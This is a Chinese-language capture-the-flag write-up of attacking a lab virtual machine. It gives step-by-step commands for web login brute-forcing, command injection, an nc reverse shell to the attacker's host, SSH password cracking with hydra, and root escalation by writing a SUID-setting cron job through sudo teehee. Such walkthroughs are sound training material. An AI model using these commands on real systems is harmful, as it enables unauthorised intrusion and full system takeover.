kali：192.168.223.131
target：192.168.223.158

首先確定目標IP為192.168.223.158

arp-scan -l

nmap掃描開放埠，發現開啟22和80埠

nmap -T4 -A 192.168.223.158 -p 1-65535 

進入網站是一個登入框，通過網站提示使用者名稱是admin

burp爆破獲得賬號密碼是happy

進入後是一個檔案管理，通過點選選項傳送命令執行的執行

抓包後發現是通過傳送命令執行進行管理

放到repeater後進行測試，發現是一個命令執行漏洞，同時+代替空格

使用nc進行連線，對方上線，同時美化介面

//target
nc+192.168.223.131+4444+-e+/bin/bash
//kali
nc -lvnp 4444
python -c "import pty;pty.spawn('/bin/bash')"

在home目錄檢視有哪些使用者，並挨個看一下，發現home目錄下的jim使用者的backups目錄下有一個old-passwords.bak檔案，裡面都是密碼，將其複製下來儲存為字典

使用hydra進行破解，獲得賬號密碼為jim和jibril04

hydra -l jim -P password.txt -t 5 ssh://192.168.223.158
ssh [email protected]
 

登陸進來發現有個mail，看一下郵箱，裡面有一封信，是charles說自己要出去，給了他密碼是^xHhA&hvim0y

cd /var/mail
cat jim

通過su提權進入charles賬戶，檢視可以使用的命令

su charles
sudo -l

teehee可以配合計劃任務使用，此時退出後等一分鐘就可以看到ls -la /bin/sh都可讀可寫可執行

//echo root chmod 4777 /bin/sh > /etc/crontab沒許可權
sudo teehee /etc/crontab
* * * * * root chmod 4777 /bin/sh

切換到/bin/sh就獲得root許可權，拿到flag